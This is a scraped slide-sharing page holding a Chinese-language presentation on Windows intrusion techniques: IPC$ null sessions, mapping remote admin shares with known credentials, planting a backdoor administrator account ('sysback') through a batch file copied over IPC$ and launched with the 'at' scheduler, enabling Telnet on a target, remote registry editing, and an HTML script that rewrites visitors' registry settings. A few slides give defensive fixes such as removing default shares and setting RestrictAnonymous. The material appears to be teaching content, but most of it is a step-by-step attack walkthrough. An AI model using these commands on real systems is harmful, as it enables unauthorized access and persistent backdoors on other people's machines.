1 / 26

常见的入侵

常见的入侵. IPC$ 空连接、 Telnet 入侵. 通过 IPC$ 空连接获取信息. 下面用实例来介绍如何建立和断开 IPC$ 空连接,看看入侵者是如何将远程磁盘映射到本地的。 通过 IPC$ 进行入侵的条件是已经获得目标主机管理员帐号和密码。. 通过 IPC$ 空连接获取信息. 单击“开始” “运行”,在“运行”对话框中键入“ CMD” 命令。. 通过 IPC$ 空连接获取信息. 建立 IPC 空连接 使用命令: net use \IPIPC$ “PASSWD” /USER:“ADMIN” 与目标主机建立 IPC$ 连接 参数说明:

Download Presentation

常见的入侵

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. 常见的入侵 IPC$空连接、Telnet入侵

  2. 通过IPC$空连接获取信息 • 下面用实例来介绍如何建立和断开IPC$空连接,看看入侵者是如何将远程磁盘映射到本地的。 • 通过IPC$进行入侵的条件是已经获得目标主机管理员帐号和密码。

  3. 通过IPC$空连接获取信息 • 单击“开始”“运行”,在“运行”对话框中键入“CMD”命令。

  4. 通过IPC$空连接获取信息 • 建立IPC空连接 使用命令:net use \\IP\IPC$ “PASSWD” /USER:“ADMIN”与目标主机建立IPC$连接 参数说明: IP:目标主机的IP IPC$:前面已经介绍过 PASSWD:已经获得的管理员密码 ADMIN:已经获得的管理员帐号 例如:net use \\172.16.1.33\ipc$ “” /user: “”

  5. 通过IPC$空连接获取信息 键入命令Net use \\192.168.131.66\IPC$ “123456” /user:“administrator”

  6. 通过IPC$空连接获取信息 使用命令:net use z: \\192.168.131.66\C$ \\192.168.131.66\C$表示目标主机上的C盘,其中“$”符号表示隐藏共享 Z: 表示将远程主机的C盘映射为本地磁盘的盘符 该命令表示把192.168.131.66这个目标主机上的C盘映射为本地的j盘

  7. 通过IPC$空连接获取信息 • 查找指定文件 映射成功后,打开“我的电脑”会发现多出出一个J盘,在该盘下的文件拷贝、粘贴等操作就像对本地磁盘操作一样。

  8. 通过IPC$空连接获取信息 • 断开连接 net use * /del 断开所有IPC$连接 “*”表示所有连接 “/del”表示删除 net use \\目标IP\ipc$ /del可以删除指定目标IP的IPC$连接

  9. 通过IPC$空连接获取信息 • 留后门帐号 • 什么是BAT文件 BAT文件是Windows系统中的一种文件格式,称为批处理文件。简单来说,就是把需要执行的一系列DOS命令按顺序先后写在一个后缀名为BAT的文本文件中。通过鼠标双击或DOS命令执行BAT文件,就相当于执行一系列DOS命令。

  10. 通过IPC$空连接获取信息 • 留后门帐号 • 相关DOS命令 • Copy命令:把一个文件拷贝到另一个位置,可以是本地计算机的目录,也可以是远程主机的目录或磁盘 • At命令:用来建立计划任务 • Net time命令:用来查看目标主机的系统时间,以便使用计划任务指定时间 • Net user命令:用来管理计算机上面的帐号 查看帐号:net user 建立帐号:net user name passwd /add 删除帐号:net user name passwd /del

  11. 通过IPC$空连接获取信息 • 实例: • 步骤1:编写BAT文件 将文件另存为“hack.bat” Net user sysback 123456 /add 该命令表示添加用户名为sysback,密码为123456的帐号 Net localgroup administrators 该命令表示把sysback添加到管理员组(administrators)

  12. 通过IPC$空连接获取信息 • 实例: • 步骤2:与目标主机建立IPC$连接 net use \\192.168.0.102\IPC$ “123456” /user:“administrator” copy hack.bat \\192.168.0.102\C$ Copy命令执行成功后,就已经把D盘下的hack.bat文件拷贝到目标主机的C盘内

  13. 通过IPC$空连接获取信息 • 实例: • 步骤3 通过计划任务使远程主机执行hack.bat文件 首先键入“net time \\IP”命令查看远程主机的系统时间,再键入“at \\IP TIME COMMAND”建立计划任务 IP:目标主机IP TIME:设定计划任务执行时间 COMMAND:计划任务要执行的命令

  14. 通过IPC$空连接获取信息 • 实例

  15. 通过IPC$空连接获取信息 • 实例: • 步骤4 等待一段时间,估计远程主机已经执行了back.bat文件,通过建立IPC$连接来验证是否已经成功建立帐号

  16. 通过IPC$空连接获取信息 • IPC$本来要求客户需要有足够的权限才能连接到目标主机,然而事实并不尽然。IPC$空连接漏洞允许客户端足使用空用户名、空密码就可以与目标主机成功建立连接。 • 入侵者利用该漏洞可以与目标主机进行空连接,但是无法执行管理类操作,例如不能执行映射网络驱动器、上传文件、执行脚本等命令。虽然入侵者不能通过该漏洞得到管理员权限,但可以用来探测目标主机的一些关键信息。

  17. 通过IPC$空连接获取信息 • 实例:通过IPC$空连接获取信息 • 步骤1 建立IPC$空连接 如果空连接建立成功,说明该目标主机管理员的技术不是很精湛。从这一点可以反映出目标主机的坚固程度。

  18. 通过IPC$空连接获取信息 • 实例:通过IPC$空连接获取信息 • 步骤1 键入“net time \\IP”命令来查看目标主机的时间信息。入侵者可以通过目标主机的时间信息来推断目标主机所在的国家或地区。当然,用这种方法来判断并不是最好的方法。

  19. 通过IPC$空连接获取信息 • 实例:通过IPC$空连接获取信息 • 步骤2 获取目标主机上的用户信息 USERINFO是利用IPC$漏洞查看目标主机用户信息的工具。通过USERINFO来查看目标主机用户信息的时候,并不需要事先建立IPC$空连接 使用访求:userinfo \\IP user IP:目标主机的IP地址 USER:预获取信息的用户名

  20. 通过IPC$空连接获取信息

  21. 安全解决方案 • 删除默认共享 了解本机共享资源:net share 删除共享资源: 建立noshare.bat文件,内容如下: net share ipc$ /del net share admin$ /del net share c$ /del net share d$ /del 将文件拷贝至“开始”“程序” “启动”

  22. 通过修改注册表来删除默认共享 • “开始”  “运行”  输入regedit打开注册表编辑器 • 打开键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters • 将AutoShareServer值改为0

  23. 禁止空连接进行枚举的方法 • 有了IPC$空连接作为连接基础,入侵者可以进行反复的试探性连接,直到连接成功、获取密码。 • 修改注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA中的键值RestrictAnonymous改为1

  24. Telnet入侵 • 利用检测出来的帐号建立IPC$连接 net use \\172.16.1.33\ipc$ “123456” /user:“sysback” • 开启远程主机中被禁用的Telnet服务 “开始”“设置”“控制面板”“管理工具”“服务”“Telnet” • 断开IPC$服务 net use \\172.16.1.33\ipc$ /del • 去掉NTLM验证 在本地计算机上建立一个与远程主机相同的帐号和密码 “开始”“程序”“附件”“命令提示符”,右键“属性”“以其他用户身份运行”,输入用户名跟密码然后用该MS-DOS进行Telnet登陆 telnet 172.16.1.33

  25. 注册表入侵 • 连接远程注册表 “开始”“运行”输入regedit ,打开注册表编辑器 • 建立IPC$连接 在注册表编辑器主界面中单击“文件”菜单“连接网络注册表”输入远程主机的IP地址

  26. 利用网页改写注册表 • 给出锁住注册表编辑器的注册表脚本 REGEDIT 4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] “DisableRegistryTools”=DWORD:00000001 • 给出入侵者主机端网页HTML关键代码 document.applets[0].GetObject().RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools”,1, “REG_DWORD”) • 将上面的代码插入到某个HTML文件,如果有人访问该页,则他的主机注册表编辑器将被锁上。

More Related